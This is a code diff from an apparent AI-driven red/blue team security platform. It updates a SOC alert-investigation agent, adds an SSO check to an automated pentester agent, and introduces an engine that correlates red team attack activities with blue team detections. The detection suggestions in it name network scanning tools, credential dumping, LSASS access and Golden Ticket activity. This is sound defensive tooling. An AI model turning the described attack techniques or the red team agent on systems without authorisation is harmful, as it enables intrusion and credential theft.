+ dn.log_input("alert", alert)
+
+ agent = create_investigation_agent(
+ model=self.model,
+ grafana_url=self.grafana_url,
+ grafana_api_key=self.grafana_api_key,
+ mitre_client=self.mitre_client,
+ state=state,
+ grafana_mcp_tools=self._mcp_tools,
+ max_steps=self.max_steps,
+ )
+
+ # Run the investigation with asyncio timeout (backup to watchdog)
+ try:
+ import asyncio
+
+ logger.info(f"Starting agent.run() with max_steps={self.max_steps}")
+
+ # Asyncio timeout as secondary measure
+ timeout_seconds = self.max_steps * 60
+
+ result = await asyncio.wait_for(
+ agent.run(initial_prompt),
+ timeout=timeout_seconds,
+ )
+
+ logger.success(f"Agent completed: {result.steps} steps, {result.stop_reason}")
+
+ status = "completed"
+ if state.escalated:
+ status = "escalated"
+ elif result.stop_reason and "max" in str(result.stop_reason).lower():
+ status = "incomplete"
+ logger.warning(
+ f"Agent reached max_steps ({self.max_steps}) without completion"
+ )
+
+ # Generate report
+ report_path = self._generate_report(state, result)
+
+ # Persist investigation for learning
+ self._persist_investigation(state, status)
+
+ dn.log_output("report_path", str(report_path))
+ dn.log_metric("investigation_success", 1)
+
+ return {
+ "investigation_id": investigation_id,
+ "status": status,
+ "report_path": str(report_path),
+ "evidence_count": len(state.evidence),
+ "techniques_identified": list(state.identified_techniques),
+ "highest_pyramid_level": state.highest_pyramid_level,
+ }
+
+ except asyncio.TimeoutError:
+ logger.error(f"Investigation timed out after {timeout_seconds}s (asyncio)")
+ logger.error(
+ f"Current state: {len(state.evidence)} evidence items, "
+ f"{len(state.timeline)} timeline events"
+ )
+ dn.log_metric("investigation_timeout", 1)
+
+ # Still generate a partial report on timeout
+ report_path = self._generate_report(state, None)
+
+ # Persist investigation for learning (even on timeout)
+ self._persist_investigation(state, "timeout")
+
+ return {
+ "investigation_id": investigation_id,
+ "status": "timeout",
+ "report_path": str(report_path),
+ "evidence_count": len(state.evidence),
+ "techniques_identified": list(state.identified_techniques),
+ "highest_pyramid_level": state.highest_pyramid_level,
+ }
+
+ except Exception as e:
+ logger.error(f"Investigation failed: {e}")
+ dn.log_metric("investigation_failed", 1)
+
+ # Persist failed investigation
+ self._persist_investigation(state, "failed")
+ raise
+
+ finally:
+ # Always cancel the watchdog when leaving this block (return or exception) so it cannot fire afterwards
+ watchdog.cancel()
+
+ def _create_alert_timeline_event(self, state: InvestigationState, alert: dict) -> None:
+ """Create an initial timeline event from the alert.
+
+ Appends one ``TimelineEvent`` with id "tl-alert-0000" to ``state.timeline``.
+ The event time comes from the alert's ``startsAt`` value; the current UTC
+ time is used when that value is empty or cannot be parsed.
+
+ Args:
+ state: Investigation state whose timeline receives the event.
+ alert: Alert dict; reads ``labels``, ``annotations`` and ``startsAt``.
+ """
labels = alert.get("labels", {})
annotations = alert.get("annotations", {})
- for key in ["mitre_technique", "mitre", "technique_id", "technique"]:
+
+ starts_at = alert.get("startsAt", "")
+ try:
+ if starts_at:
+ # fromisoformat may reject a trailing "Z", so spell it as an explicit UTC offset.
+ alert_time = datetime.fromisoformat(starts_at.replace("Z", "+00:00"))
+ else:
+ alert_time = datetime.now(timezone.utc)
+ except ValueError:
+ alert_time = datetime.now(timezone.utc)
+
+ alert_name = labels.get("alertname", "Unknown Alert")
+ severity = labels.get("severity", "unknown")
+ summary = annotations.get("summary", annotations.get("description", ""))
+
+ description = f"{severity.upper()} alert triggered: {alert_name}"
+ if summary:
+ description += f" - {summary[:100]}"
+
+ mitre_techniques = []
+ # Same key list as the technique auto-recording in investigate(), so a technique
+ # stored under "technique" is also attached to the timeline event.
+ for key in ["mitre_technique", "mitre", "technique_id", "technique"]:
if labels.get(key):
- state.identified_techniques.add(labels[key])
- logger.info(f"Auto-recorded MITRE technique from alert: {labels[key]}")
+ mitre_techniques.append(labels[key])
break
if annotations.get(key):
- state.identified_techniques.add(annotations[key])
- logger.info(f"Auto-recorded MITRE technique from alert: {annotations[key]}")
+ mitre_techniques.append(annotations[key])
break
- initial_prompt = build_initial_prompt(alert)
-
- with dn.run(tags=["soc-investigation", alert_name]):
- dn.log_params(
- model=self.model,
- investigation_id=investigation_id,
- alert_name=alert_name,
- alert_severity=alert.get("labels", {}).get("severity", "unknown"),
- max_steps=self.max_steps,
- mcp_tools_available=self._mcp_tools is not None,
- mcp_tool_count=len(self._mcp_tools) if self._mcp_tools else 0,
- )
- dn.log_input("alert", alert)
-
- agent = create_investigation_agent(
- model=self.model,
- grafana_url=self.grafana_url,
- grafana_api_key=self.grafana_api_key,
- mitre_client=self.mitre_client,
- state=state,
- grafana_mcp_tools=self._mcp_tools,
- max_steps=self.max_steps,
- )
-
- # Run the investigation with timeout
- try:
- import asyncio
+ event = TimelineEvent(
+ id="tl-alert-0000",
+ timestamp=alert_time,
+ description=description,
+ evidence_ids=[],
+ mitre_techniques=mitre_techniques,
+ confidence=0.9,
+ source="alert",
+ )
- logger.info(f"Starting agent.run() with max_steps={self.max_steps}")
+ state.timeline.append(event)
+ logger.info(f"Created initial timeline event from alert: {description[:50]}...")
- # Add a generous timeout (5 minutes per step)
- timeout_seconds = self.max_steps * 300 # 5 minutes per step
+ def _generate_report(self, state: InvestigationState, _result) -> Path:
+ """Generate the markdown investigation report."""
+ from ares.reports.investigation import MarkdownReportGenerator
- result = await asyncio.wait_for(
- agent.run(initial_prompt),
- timeout=timeout_seconds,
- )
+ generator = MarkdownReportGenerator(self.report_dir)
+ return generator.generate(state)
- logger.success(f"Agent completed: {result.steps} steps, {result.stop_reason}")
+ def _persist_investigation(self, state: InvestigationState, status: str) -> None:
+ """Persist investigation results for learning.
- # Generate report
- report_path = self._generate_report(state, result)
+ Args:
+ state: Investigation state to persist
+ status: Final status (completed, escalated, timeout, failed)
+ """
+ try:
+ store = get_investigation_store()
- dn.log_output("report_path", str(report_path))
- dn.log_metric("investigation_success", 1)
+ # Create stored investigation from state
+ stored = create_stored_investigation_from_state(state, status)
- return {
- "investigation_id": investigation_id,
- "status": "completed" if not state.escalated else "escalated",
- "report_path": str(report_path),
- "evidence_count": len(state.evidence),
- "techniques_identified": list(state.identified_techniques),
- "highest_pyramid_level": state.highest_pyramid_level,
- }
+ # Store the investigation
+ store.store_investigation(stored)
- except asyncio.TimeoutError as timeout_err:
- logger.error(f"Investigation timed out after {timeout_seconds}s")
- logger.error(
- f"Current state: {len(state.evidence)} evidence items, {len(state.timeline)} timeline events"
- )
- dn.log_metric("investigation_timeout", 1)
- raise TimeoutError(
- f"Investigation exceeded {timeout_seconds}s timeout"
- ) from timeout_err
+ # Update query effectiveness statistics
+ alert_name = state.alert.get("labels", {}).get("alertname", "unknown")
+ for query in state.executed_queries:
+ query_str = query.get("query", "")
+ if query_str:
+ # Normalize query for pattern matching
+ pattern = self._normalize_query_pattern(query_str)
+ successful = query.get("result_count", 0) > 0
+ # Approximation: true if the investigation recorded any evidence at all (not tied to this specific query)
+ produced_evidence = len(state.evidence) > 0
- except Exception as e:
- logger.error(f"Investigation failed: {e}")
- dn.log_metric("investigation_failed", 1)
- raise
+ store.update_query_effectiveness(
+ query_pattern=pattern,
+ successful=successful,
+ produced_evidence=produced_evidence,
+ alert_type=alert_name,
+ )
- def _generate_report(self, state: InvestigationState, _result) -> Path:
- """Generate the markdown investigation report."""
- from ares.reports.investigation import MarkdownReportGenerator
+ logger.info(f"Persisted investigation {state.investigation_id} to store")
- generator = MarkdownReportGenerator(self.report_dir)
- return generator.generate(state)
+ except Exception as e:
+ # Don't fail the investigation if persistence fails
+ logger.warning(f"Failed to persist investigation: {e}")
+
+ def _normalize_query_pattern(self, query: str) -> str:
+ """Normalize a query string into a reusable pattern.
+
+ Replaces timestamps, IP addresses, UUIDs and dotted hostnames with the
+ placeholders <TIMESTAMP>, <IP>, <UUID> and <HOSTNAME>, in that order, so
+ queries that differ only in those values map to the same pattern.
+
+ Args:
+ query: Raw query string
+
+ Returns:
+ Normalized pattern string
+ """
+ import re
+
+ pattern = query
+
+ # Replace timestamps with placeholder
+ pattern = re.sub(
+ r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:\.\d+)?(?:Z|[+-]\d{2}:\d{2})?",
+ "<TIMESTAMP>",
+ pattern,
+ )
+
+ # Replace IP addresses with placeholder
+ pattern = re.sub(r"\d+\.\d+\.\d+\.\d+", "<IP>", pattern)
+
+ # Replace UUIDs with placeholder
+ pattern = re.sub(
+ r"[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}",
+ "<UUID>",
+ pattern,
+ flags=re.IGNORECASE,
+ )
+
+ # Replace specific hostnames (anything.domain.tld format)
+ return re.sub(
+ r"\b[a-z0-9-]+\.[a-z0-9-]+\.[a-z]{2,}\b",
+ "<HOSTNAME>",
+ pattern,
+ flags=re.IGNORECASE,
+ )
diff --git a/src/ares/agents/red/pentester.py b/src/ares/agents/red/pentester.py
index d976f3f1..f72a5daf 100644
--- a/src/ares/agents/red/pentester.py
+++ b/src/ares/agents/red/pentester.py
@@ -12,6 +12,7 @@
from ares.core.factories.red_factory import create_redteam_agent
from ares.core.models import RedTeamState, Target
+from ares.core.remote import SSOTokenExpiredError, validate_sso_credentials
from ares.core.templates import get_template_loader
from ares.integrations.mitre import MITREAttackClient
from ares.reports.redteam import RedTeamReportGenerator
@@ -87,6 +88,14 @@ async def execute_operation(self, target_ip: str) -> dict:
logger.info(f"Starting red team operation {operation_id} against: {target_ip}")
+ # Validate SSO credentials before starting - fail fast if expired
+ try:
+ validate_sso_credentials()
+ logger.info("AWS SSO credentials validated successfully")
+ except SSOTokenExpiredError as e:
+ logger.error(f"Cannot start operation - {e}")
+ raise
+
# Create operation state
state = RedTeamState(
operation_id=operation_id,
diff --git a/src/ares/core/correlation.py b/src/ares/core/correlation.py
new file mode 100644
index 00000000..6c2e0358
--- /dev/null
+++ b/src/ares/core/correlation.py
@@ -0,0 +1,844 @@
+"""
+Red-Blue Correlation Engine.
+
+Correlates red team attack activities with blue team detections
+to measure detection coverage and identify gaps.
+"""
+
+import re
+from dataclasses import dataclass, field
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+from typing import Any, ClassVar
+
+from loguru import logger
+
+
+@dataclass
+class RedTeamActivity:
+ """A single red team activity/action."""
+
+ timestamp: datetime
+ technique_id: str | None
+ technique_name: str | None
+ action: str
+ target_ip: str | None
+ target_host: str | None
+ credential_used: str | None
+ success: bool
+ metadata: dict[str, Any] = field(default_factory=dict)
+
+ @property
+ def key(self) -> str:
+ """Generate a unique key for this activity."""
+ return f"{self.timestamp.isoformat()}:{self.technique_id}:{self.target_ip}"
+
+
+@dataclass
+class BlueTeamDetection:
+ """A blue team detection/alert."""
+
+ timestamp: datetime
+ alert_name: str
+ technique_id: str | None
+ severity: str
+ target_ip: str | None
+ target_host: str | None
+ investigation_id: str | None
+ status: str # completed, escalated, timeout
+ evidence_count: int
+ highest_pyramid_level: int
+ metadata: dict[str, Any] = field(default_factory=dict)
+
+ @property
+ def key(self) -> str:
+ """Generate a unique key for this detection."""
+ return f"{self.timestamp.isoformat()}:{self.technique_id}:{self.alert_name}"
+
+
@dataclass
class CorrelationMatch:
    """Pairing of one red team activity with one blue team detection."""

    red_activity: RedTeamActivity
    blue_detection: BlueTeamDetection
    time_delta_seconds: float
    technique_match: bool
    target_match: bool
    confidence: float

    @property
    def match_quality(self) -> str:
        """Grade the match as STRONG, GOOD, WEAK or TENUOUS.

        The grade depends on whether technique and target agree and on how far
        apart (in absolute seconds) the two events are.
        """
        gap = abs(self.time_delta_seconds)
        within_five_minutes = gap < 300
        within_ten_minutes = gap < 600

        if self.technique_match:
            if self.target_match and within_five_minutes:
                return "STRONG"
            if within_ten_minutes:
                return "GOOD"
            # Same technique, but too far apart in time for a better grade.
            return "WEAK"

        if self.target_match and within_five_minutes:
            return "WEAK"
        return "TENUOUS"
+
+
@dataclass
class DetectionGap:
    """A red team activity for which no blue team detection was matched."""

    red_activity: RedTeamActivity
    reason: str
    recommended_detection: str | None = field(default=None)
    mitre_data_sources: list[str] = field(default_factory=list)
+
+
@dataclass
class CorrelationReport:
    """Full correlation analysis report."""

    analysis_timestamp: datetime
    red_operation_id: str
    time_window_start: datetime
    time_window_end: datetime

    # Counts
    total_red_activities: int
    total_blue_detections: int
    matched_activities: int
    undetected_activities: int
    false_positive_detections: int

    # Details
    matches: list[CorrelationMatch]
    gaps: list[DetectionGap]
    false_positives: list[BlueTeamDetection]

    # Metrics
    detection_rate: float
    false_positive_rate: float
    mean_time_to_detect: float | None  # seconds

    # By technique
    technique_coverage: dict[str, dict[str, Any]]

    def to_dict(self) -> dict[str, Any]:
        """Convert the report to a plain dictionary.

        Timestamps are rendered as ISO-8601 strings, rates as percentages with
        one decimal, and action texts are cut to 100 characters.

        Returns:
            Dictionary with the keys ``analysis_timestamp``,
            ``red_operation_id``, ``time_window``, ``summary``,
            ``technique_coverage``, ``matches``, ``gaps`` and
            ``false_positives``.
        """
        # Only None means "no measurement"; 0.0 is a real (instant) detection
        # time and must not be reported as N/A.
        if self.mean_time_to_detect is None:
            mean_ttd = "N/A"
        else:
            mean_ttd = f"{self.mean_time_to_detect:.1f}s"

        match_rows = [
            {
                "red_technique": m.red_activity.technique_id,
                "red_action": m.red_activity.action[:100],
                "blue_alert": m.blue_detection.alert_name,
                "time_delta_seconds": m.time_delta_seconds,
                "match_quality": m.match_quality,
                "confidence": m.confidence,
            }
            for m in self.matches
        ]
        gap_rows = [
            {
                "technique": g.red_activity.technique_id,
                "action": g.red_activity.action[:100],
                "timestamp": g.red_activity.timestamp.isoformat(),
                "reason": g.reason,
                "recommended_detection": g.recommended_detection,
            }
            for g in self.gaps
        ]
        false_positive_rows = [
            {
                "alert_name": fp.alert_name,
                "technique": fp.technique_id,
                "timestamp": fp.timestamp.isoformat(),
            }
            for fp in self.false_positives
        ]

        return {
            "analysis_timestamp": self.analysis_timestamp.isoformat(),
            "red_operation_id": self.red_operation_id,
            "time_window": {
                "start": self.time_window_start.isoformat(),
                "end": self.time_window_end.isoformat(),
            },
            "summary": {
                "total_red_activities": self.total_red_activities,
                "total_blue_detections": self.total_blue_detections,
                "matched_activities": self.matched_activities,
                "undetected_activities": self.undetected_activities,
                "false_positive_detections": self.false_positive_detections,
                "detection_rate": f"{self.detection_rate * 100:.1f}%",
                "false_positive_rate": f"{self.false_positive_rate * 100:.1f}%",
                "mean_time_to_detect": mean_ttd,
            },
            "technique_coverage": self.technique_coverage,
            "matches": match_rows,
            "gaps": gap_rows,
            "false_positives": false_positive_rows,
        }
+
+
class RedBlueCorrelator:
    """Correlates red team activities with blue team detections.

    This engine:
    1. Parses red team operation reports
    2. Parses blue team investigation reports
    3. Matches activities based on time, technique, and target
    4. Identifies detection gaps
    5. Calculates coverage metrics
    """

    # Time window for matching (activities within this window are considered related)
    DEFAULT_TIME_WINDOW_MINUTES = 30

    TECHNIQUE_PATTERNS: ClassVar[list[str]] = [
        r"T\d{4}(?:\.\d{3})?",  # T1234 or T1234.001
    ]

    # Detection suggestions for undetected activities, keyed by technique ID.
    _TECHNIQUE_RECOMMENDATIONS: ClassVar[dict[str, str]] = {
        "T1046": "Add alert for network scanning patterns (nmap, masscan)",
        "T1110": "Add alert for multiple failed authentication attempts",
        "T1003": "Add alert for LSASS access or credential dumping tools",
        "T1078.002": "Add alert for new domain admin group membership",
        "T1558.001": "Add alert for krbtgt service ticket requests with RC4",
        "T1021.002": "Add alert for remote SMB connections from unusual sources",
    }

    def __init__(
        self,
        reports_dir: Path,
        time_window_minutes: int = DEFAULT_TIME_WINDOW_MINUTES,
    ):
        """Initialize the correlator.

        Args:
            reports_dir: Directory containing red team and investigation reports
            time_window_minutes: Time window for matching activities
        """
        self.reports_dir = Path(reports_dir)
        self.time_window = timedelta(minutes=time_window_minutes)

    @staticmethod
    def _ensure_utc(value: datetime) -> datetime:
        """Return ``value`` unchanged if it is timezone-aware, else tag it as UTC.

        Parsed report timestamps may lack an offset; mixing naive and aware
        datetimes raises ``TypeError`` on comparison and subtraction.
        """
        if value.tzinfo is None or value.utcoffset() is None:
            return value.replace(tzinfo=timezone.utc)
        return value

    @staticmethod
    def _table_cell(text: str, limit: int) -> str:
        """Fit ``text`` into a markdown table cell of at most ``limit`` characters.

        An ellipsis is appended only when text was actually cut, and pipe
        characters are escaped so they cannot split the table row.
        """
        shortened = text if len(text) <= limit else f"{text[:limit]}..."
        return shortened.replace("|", "\\|")

    def load_red_team_report(self, report_path: Path) -> tuple[str, list[RedTeamActivity]]:
        """Load and parse a red team report.

        Activities are derived from the hosts section, the credentials section,
        the timeline table and the domain-admin / golden-ticket markers.

        Args:
            report_path: Path to the red team report markdown file

        Returns:
            Tuple of (operation_id, list of activities)
        """
        # Reports contain non-ASCII markers (e.g. "✓"); do not rely on the
        # platform default encoding.
        content = report_path.read_text(encoding="utf-8")
        content_lower = content.lower()
        activities: list[RedTeamActivity] = []

        # Extract operation ID
        operation_id_match = re.search(r"\*\*Operation ID\*\*:\s*(\S+)", content)
        operation_id = operation_id_match.group(1) if operation_id_match else "unknown"

        # Extract target IP
        target_ip_match = re.search(r"\*\*Target\*\*:\s*(\d+\.\d+\.\d+\.\d+)", content)
        target_ip = target_ip_match.group(1) if target_ip_match else None

        # Extract start time; fall back to "now" when missing or unparseable
        started_at = datetime.now(timezone.utc)
        started_match = re.search(r"\*\*Started\*\*:\s*(.+?)(?:\n|$)", content)
        if started_match:
            started_text = started_match.group(1).strip()
            try:
                started_at = datetime.strptime(started_text, "%Y-%m-%d %H:%M:%S UTC").replace(
                    tzinfo=timezone.utc
                )
            except ValueError:
                logger.warning(
                    f"Unparseable start time {started_text!r} in {report_path}; using current time"
                )

        def record(
            timestamp: datetime,
            technique_id: str,
            technique_name: str | None,
            action: str,
            metadata: dict[str, Any] | None = None,
        ) -> None:
            """Append a successful activity against the report's target."""
            activities.append(
                RedTeamActivity(
                    timestamp=timestamp,
                    technique_id=technique_id,
                    technique_name=technique_name,
                    action=action,
                    target_ip=target_ip,
                    target_host=None,
                    credential_used=None,
                    success=True,
                    metadata=metadata if metadata is not None else {},
                )
            )

        # Extract hosts discovered
        hosts_section = re.search(r"### Hosts \((\d+)\)(.*?)(?=###|\Z)", content, re.DOTALL)
        if hosts_section:
            host_count = int(hosts_section.group(1))
            if host_count > 0:
                record(
                    started_at,
                    "T1046",  # Network Service Discovery
                    "Network Service Discovery",
                    f"Discovered {host_count} host(s) via network scanning",
                )

        # Extract credentials obtained
        creds_section = re.search(r"### Credentials \((\d+)\)(.*?)(?=###|\Z)", content, re.DOTALL)
        if creds_section:
            cred_matches = re.findall(
                r"\*\*(\S+)\*\*\s*\n.*?Source:\s*(.+?)(?:\n|$)", creds_section.group(2)
            )
            for username, source in cred_matches:
                guessed = "guessing" in source.lower()
                record(
                    started_at + timedelta(minutes=1),  # Slightly after start
                    "T1110" if guessed else "T1003",
                    "Credential Guessing" if guessed else "Credential Dumping",
                    f"Obtained credential for {username} via {source}",
                    {"username": username, "source": source},
                )

        # Extract MITRE techniques from timeline
        timeline_section = re.search(
            r"### Timeline of Key Events(.*?)(?=---|\Z)", content, re.DOTALL
        )
        if timeline_section:
            event_matches = re.findall(
                r"\|\s*([^|]+)\s*\|\s*([^|]+)\s*\|\s*(T\d{4}(?:\.\d{3})?)\s*\|",
                timeline_section.group(1),
            )
            for timestamp_str, description, technique_id in event_matches:
                try:
                    # A timestamp without an offset parses as naive; treat it
                    # as UTC so it can be compared with the other events.
                    event_time = self._ensure_utc(
                        datetime.fromisoformat(timestamp_str.strip().replace("Z", "+00:00"))
                    )
                except ValueError:
                    event_time = started_at
                record(event_time, technique_id.strip(), None, description.strip())

        # Check for domain admin / golden ticket
        if "Domain Admin Access**: ✓" in content or "has_domain_admin: true" in content_lower:
            record(
                started_at + timedelta(minutes=5),
                "T1078.002",
                "Valid Accounts: Domain Accounts",
                "Achieved Domain Admin access",
            )

        if "Golden Ticket**: ✓" in content or "has_golden_ticket: true" in content_lower:
            record(
                started_at + timedelta(minutes=6),
                "T1558.001",
                "Golden Ticket",
                "Generated Golden Ticket for persistence",
            )

        logger.info(f"Loaded {len(activities)} activities from red team report {operation_id}")
        return operation_id, activities

    def _parse_detection_timestamp(self, content: str, filename: str) -> datetime:
        """Determine when a detection fired.

        Uses the ``startsAt`` field of the embedded alert payload when present,
        otherwise a ``YYYYMMDD_HHMMSS`` stamp in the file name, otherwise the
        current UTC time. An unparseable value also yields the current time.
        """
        starts_at_match = re.search(r'"startsAt":\s*"([^"]+)"', content)
        if starts_at_match:
            try:
                parsed = datetime.fromisoformat(starts_at_match.group(1).replace("Z", "+00:00"))
            except ValueError:
                return datetime.now(timezone.utc)
            return self._ensure_utc(parsed)

        date_match = re.search(r"(\d{8}_\d{6})", filename)
        if date_match:
            try:
                return datetime.strptime(date_match.group(1), "%Y%m%d_%H%M%S").replace(
                    tzinfo=timezone.utc
                )
            except ValueError:
                return datetime.now(timezone.utc)

        return datetime.now(timezone.utc)

    def load_investigation_report(self, report_path: Path) -> BlueTeamDetection | None:
        """Load and parse a blue team investigation report.

        Args:
            report_path: Path to the investigation report markdown file

        Returns:
            BlueTeamDetection object, or None for DatasourceNoData reports
        """
        # Skip DatasourceNoData reports (decided from the name alone, so the
        # file is not read needlessly)
        if "DatasourceNoData" in report_path.name:
            return None

        content = report_path.read_text(encoding="utf-8")

        # Extract investigation ID
        inv_id_match = re.search(r"\*\*Investigation ID:\*\*\s*`?(\S+?)`?(?:\n|$)", content)
        investigation_id = inv_id_match.group(1) if inv_id_match else None

        # Extract alert name
        alert_match = re.search(r"\|\s*Alert Name\s*\|\s*(.+?)\s*\|", content)
        alert_name = alert_match.group(1).strip() if alert_match else "Unknown"

        # Extract severity
        severity_match = re.search(r"\|\s*Severity\s*\|\s*(\w+)\s*\|", content)
        severity = severity_match.group(1).strip() if severity_match else "unknown"

        # Extract timestamp from alert payload, falling back to the file name
        timestamp = self._parse_detection_timestamp(content, report_path.name)

        # Extract MITRE technique (first technique ID anywhere in the report)
        technique_match = re.search(r"(T\d{4}(?:\.\d{3})?)", content)
        technique_id = technique_match.group(1) if technique_match else None

        # Extract status
        status_match = re.search(r"\|\s*Status\s*\|\s*(\w+)", content)
        status = status_match.group(1).strip().lower() if status_match else "unknown"

        # Extract evidence count
        evidence_match = re.search(r"\*\*Evidence Collected:\*\*\s*(\d+)", content)
        evidence_count = int(evidence_match.group(1)) if evidence_match else 0

        # Extract pyramid level
        pyramid_match = re.search(r"\*\*Highest Pyramid Level:\*\*\s*(\d+)", content)
        highest_pyramid_level = int(pyramid_match.group(1)) if pyramid_match else 0

        # Extract target IP from content (first dotted quad anywhere in the report)
        ip_match = re.search(r"(\d+\.\d+\.\d+\.\d+)", content)
        target_ip = ip_match.group(1) if ip_match else None

        return BlueTeamDetection(
            timestamp=timestamp,
            alert_name=alert_name,
            technique_id=technique_id,
            severity=severity,
            target_ip=target_ip,
            target_host=None,
            investigation_id=investigation_id,
            status=status,
            evidence_count=evidence_count,
            highest_pyramid_level=highest_pyramid_level,
        )

    def load_all_reports(
        self,
    ) -> tuple[list[tuple[str, list[RedTeamActivity]]], list[BlueTeamDetection]]:
        """Load all reports from the reports directory.

        Files named ``redteam-*.md`` are parsed as red team reports and
        ``investigation_*.md`` as investigation reports; a file that fails to
        parse is logged and skipped.

        Returns:
            Tuple of (list of (operation_id, activities), list of detections)
        """
        red_team_reports = []
        blue_team_detections = []

        # Sorted so results do not depend on directory listing order.
        for report_file in sorted(self.reports_dir.glob("*.md")):
            if report_file.name.startswith("redteam-"):
                try:
                    operation_id, activities = self.load_red_team_report(report_file)
                    red_team_reports.append((operation_id, activities))
                except Exception as e:
                    logger.warning(f"Failed to parse red team report {report_file}: {e}")

            elif report_file.name.startswith("investigation_"):
                try:
                    detection = self.load_investigation_report(report_file)
                    if detection:
                        blue_team_detections.append(detection)
                except Exception as e:
                    logger.warning(f"Failed to parse investigation report {report_file}: {e}")

        logger.info(
            f"Loaded {len(red_team_reports)} red team reports, "
            f"{len(blue_team_detections)} investigation reports"
        )
        return red_team_reports, blue_team_detections

    def correlate(  # noqa: PLR0912
        self,
        red_activities: list[RedTeamActivity],
        blue_detections: list[BlueTeamDetection],
        operation_id: str = "unknown",
    ) -> CorrelationReport:
        """Correlate red team activities with blue team detections.

        Each activity is paired with its highest-confidence detection inside
        the time window. Confidence is 0.5 for a technique match, plus 0.3 for
        a target IP match, plus up to 0.2 for time proximity; pairs below 0.3
        are discarded.

        Args:
            red_activities: List of red team activities
            blue_detections: List of blue team detections
            operation_id: Red team operation ID

        Returns:
            CorrelationReport with analysis results
        """
        matches: list[CorrelationMatch] = []
        matched_red_keys: set[str] = set()
        matched_blue_keys: set[str] = set()

        red_activities = sorted(red_activities, key=lambda x: x.timestamp)
        blue_detections = sorted(blue_detections, key=lambda x: x.timestamp)

        if red_activities:
            # Sorted by time, so the first/last entries bound the operation.
            time_window_start = red_activities[0].timestamp - self.time_window
            time_window_end = red_activities[-1].timestamp + self.time_window
        else:
            now = datetime.now(timezone.utc)
            time_window_start = now - timedelta(hours=1)
            time_window_end = now

        window_seconds = self.time_window.total_seconds()

        # Match activities to detections
        for red_activity in red_activities:
            best_match: CorrelationMatch | None = None
            best_confidence = 0.0

            for detection in blue_detections:
                time_delta = (detection.timestamp - red_activity.timestamp).total_seconds()

                if abs(time_delta) > window_seconds:
                    continue

                technique_match = (
                    red_activity.technique_id is not None
                    and detection.technique_id is not None
                    and red_activity.technique_id == detection.technique_id
                )

                target_match = (
                    red_activity.target_ip is not None
                    and detection.target_ip is not None
                    and red_activity.target_ip == detection.target_ip
                )

                confidence = 0.0
                if technique_match:
                    confidence += 0.5
                if target_match:
                    confidence += 0.3
                # Time proximity bonus (closer = higher confidence). With a
                # zero-width window only simultaneous events reach this point,
                # so they get the full bonus instead of dividing by zero.
                proximity = 1 - abs(time_delta) / window_seconds if window_seconds > 0 else 1.0
                time_bonus = max(0, proximity) * 0.2
                confidence += time_bonus

                if confidence > best_confidence:
                    best_confidence = confidence
                    best_match = CorrelationMatch(
                        red_activity=red_activity,
                        blue_detection=detection,
                        time_delta_seconds=time_delta,
                        technique_match=technique_match,
                        target_match=target_match,
                        confidence=confidence,
                    )

            if best_match and best_match.confidence >= 0.3:
                matches.append(best_match)
                matched_red_keys.add(red_activity.key)
                matched_blue_keys.add(best_match.blue_detection.key)

        # Identify detection gaps (undetected red activities)
        gaps: list[DetectionGap] = [
            DetectionGap(
                red_activity=activity,
                reason=self._determine_gap_reason(activity, blue_detections),
                recommended_detection=self._recommend_detection(activity),
            )
            for activity in red_activities
            if activity.key not in matched_red_keys
        ]

        # Identify false positives (detections without matching red activity)
        in_window = [
            d for d in blue_detections if time_window_start <= d.timestamp <= time_window_end
        ]
        false_positives: list[BlueTeamDetection] = [
            d for d in in_window if d.key not in matched_blue_keys
        ]

        total_red = len(red_activities)
        matched_count = len(matches)
        detection_rate = matched_count / total_red if total_red > 0 else 0.0
        false_positive_rate = len(false_positives) / len(in_window) if in_window else 0.0

        # Only detections at or after the activity count towards time-to-detect.
        time_deltas = [abs(m.time_delta_seconds) for m in matches if m.time_delta_seconds >= 0]
        mean_ttd = sum(time_deltas) / len(time_deltas) if time_deltas else None

        technique_coverage = self._calculate_technique_coverage(red_activities, matches, gaps)

        return CorrelationReport(
            analysis_timestamp=datetime.now(timezone.utc),
            red_operation_id=operation_id,
            time_window_start=time_window_start,
            time_window_end=time_window_end,
            total_red_activities=total_red,
            total_blue_detections=len(blue_detections),
            matched_activities=matched_count,
            undetected_activities=len(gaps),
            false_positive_detections=len(false_positives),
            matches=matches,
            gaps=gaps,
            false_positives=false_positives,
            detection_rate=detection_rate,
            false_positive_rate=false_positive_rate,
            mean_time_to_detect=mean_ttd,
            technique_coverage=technique_coverage,
        )

    def _determine_gap_reason(
        self,
        activity: RedTeamActivity,
        detections: list[BlueTeamDetection],
    ) -> str:
        """Determine why an activity was not detected."""
        if not activity.technique_id:
            return "Activity has no associated MITRE technique"

        if not any(d.technique_id == activity.technique_id for d in detections):
            return f"No alert rules configured for technique {activity.technique_id}"

        return "Alert exists but did not trigger within time window (possible log ingestion delay or query timeout)"

    def _recommend_detection(self, activity: RedTeamActivity) -> str | None:
        """Recommend a detection for an undetected activity.

        Returns:
            The suggestion for the activity's technique, or None when the
            activity has no technique or no suggestion is known for it.
        """
        if activity.technique_id:
            return self._TECHNIQUE_RECOMMENDATIONS.get(activity.technique_id)
        return None

    def _calculate_technique_coverage(
        self,
        activities: list[RedTeamActivity],
        matches: list[CorrelationMatch],
        gaps: list[DetectionGap],
    ) -> dict[str, dict[str, Any]]:
        """Calculate detection coverage per technique.

        Returns:
            Mapping of technique ID to ``total``, ``detected``, ``missed`` and
            ``detection_rate``. Activities without a technique are ignored.
        """
        coverage: dict[str, dict[str, Any]] = {}

        for activity in activities:
            if activity.technique_id:
                entry = coverage.setdefault(
                    activity.technique_id,
                    {"total": 0, "detected": 0, "missed": 0, "detection_rate": 0.0},
                )
                entry["total"] += 1

        for match in matches:
            if match.red_activity.technique_id:
                coverage[match.red_activity.technique_id]["detected"] += 1

        for gap in gaps:
            if gap.red_activity.technique_id:
                coverage[gap.red_activity.technique_id]["missed"] += 1

        for data in coverage.values():
            if data["total"] > 0:
                data["detection_rate"] = data["detected"] / data["total"]

        return coverage

    def generate_report_markdown(self, report: CorrelationReport) -> str:  # noqa: PLR0912
        """Generate a markdown report from correlation results.

        Args:
            report: CorrelationReport object

        Returns:
            Markdown formatted report string
        """
        cell = self._table_cell

        # 0.0 is a valid mean time to detect; only None means "not available".
        if report.mean_time_to_detect is None:
            mean_ttd = "N/A"
        else:
            mean_ttd = f"{report.mean_time_to_detect:.0f}s"

        lines = [
